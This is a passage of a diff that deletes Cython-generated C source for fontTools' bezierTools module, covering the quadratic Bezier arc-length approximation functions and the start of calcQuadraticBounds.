Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateQuadraticArcLength", 1); - - /* "fontTools/misc/bezierTools.py":251 - * Approximate arc length value. - * """ - * return approximateQuadraticArcLengthC(complex(*pt1), complex(*pt2), complex(*pt3)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_approximateQuadraticArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_7, 3+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC, "approximateQuadraticArcLengthC(double complex pt1, double complex pt2, double complex pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Uses Gauss-Legendre quadrature for a branch-free approximation.\n See :func:`calcQuadraticArcLength` for a slower but more accurate result.\n\n Args:\n pt1: Start point of the Bezier as a complex number.\n pt2: Handle point of the Bezier as a complex number.\n pt3: End point of the Bezier as a complex number.\n\n Returns:\n Approximate arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC = {"approximateQuadraticArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateQuadraticArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 254, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 254, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLengthC", 1, 3, 3, 1); __PYX_ERR(0, 254, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 254, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLengthC", 1, 3, 3, 2); __PYX_ERR(0, 254, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateQuadraticArcLengthC") < 0)) __PYX_ERR(0, 254, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 265, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 265, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 265, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLengthC", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 254, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3) { - double __pyx_v_v0; - double __pyx_v_v1; - double __pyx_v_v2; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateQuadraticArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":287 - * # abs(BezierCurveC[2].diff(t).subs({t:T})) for T in sorted(.5, .5sqrt(3/5)/2), - * # weighted 5/18, 8/18, 5/18 respectively. - * v0 = abs( # <<<<<<<<<<<<<< - * -0.492943519233745 * pt1 + 0.430331482911935 * pt2 + 0.0626120363218102 * pt3 - * ) - */ - __pyx_v_v0 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.492943519233745, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.430331482911935, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.0626120363218102, 0), __pyx_v_pt3))); - - /* "fontTools/misc/bezierTools.py":290 - * -0.492943519233745 * pt1 + 0.430331482911935 * pt2 + 0.0626120363218102 * pt3 - * ) - * v1 = abs(pt3 - pt1) * 0.4444444444444444 # <<<<<<<<<<<<<< - * v2 = abs( - * -0.0626120363218102 * pt1 - 0.430331482911935 * pt2 + 0.492943519233745 * pt3 - */ - __pyx_v_v1 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt1)) * 0.4444444444444444); - - /* "fontTools/misc/bezierTools.py":291 - * ) - * v1 = abs(pt3 - pt1) * 0.4444444444444444 - * v2 = abs( # <<<<<<<<<<<<<< - * -0.0626120363218102 * pt1 - 0.430331482911935 * pt2 + 0.492943519233745 * pt3 - * ) - */ - __pyx_v_v2 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_diff_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.0626120363218102, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.430331482911935, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.492943519233745, 0), __pyx_v_pt3))); - - /* "fontTools/misc/bezierTools.py":295 - * ) - * - * return v0 + v1 + v2 # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyFloat_FromDouble(((__pyx_v_v0 + __pyx_v_v1) + __pyx_v_v2)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 295, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_17calcQuadraticBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_16calcQuadraticBounds, "calcQuadraticBounds(pt1, pt2, pt3)\nCalculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as a 2D tuple.\n pt2: Handle point of the Bezier as a 2D tuple.\n pt3: End point of the Bezier as a 2D tuple.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcQuadraticBounds((0, 0), (50, 100), (100, 0))\n (0, 0, 100, 50.0)\n >>> calcQuadraticBounds((0, 0), (100, 0), (100, 100))\n (0.0, 0.0, 100, 100)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_17calcQuadraticBounds = {"calcQuadraticBounds", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_17calcQuadraticBounds, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_16calcQuadraticBounds}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_17calcQuadraticBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticBounds (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 298, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 298, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticBounds", 1, 3, 3, 1); __PYX_ERR(0, 298, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 298, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticBounds", 1, 3, 3, 2); __PYX_ERR(0, 298, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticBounds") < 0)) __PYX_ERR(0, 298, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticBounds", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 298, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_16calcQuadraticBounds(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_16calcQuadraticBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_ax2 = NULL; - PyObject *__pyx_v_ay2 = NULL; - PyObject *__pyx_v_roots = NULL; - PyObject *__pyx_v_points = NULL; - PyObject *__pyx_7genexpr__pyx_v_t = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_t_11; - Py_ssize_t __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticBounds", 1); - - /* "fontTools/misc/bezierTools.py":316 - * (0.0, 0.0, 100, 100) - * """ - * (ax, ay), (bx, by), (cx, cy) = calcQuadraticParameters(pt1, pt2, pt3) # <<<<<<<<<<<<<< - * ax2 = ax * 2.0 - * ay2 = ay * 2.0 - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 316, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_2 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 2; __pyx_t_5 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_5)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_5); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 3) < 0) __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 316, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 316, __pyx_L1_error) - } - #if 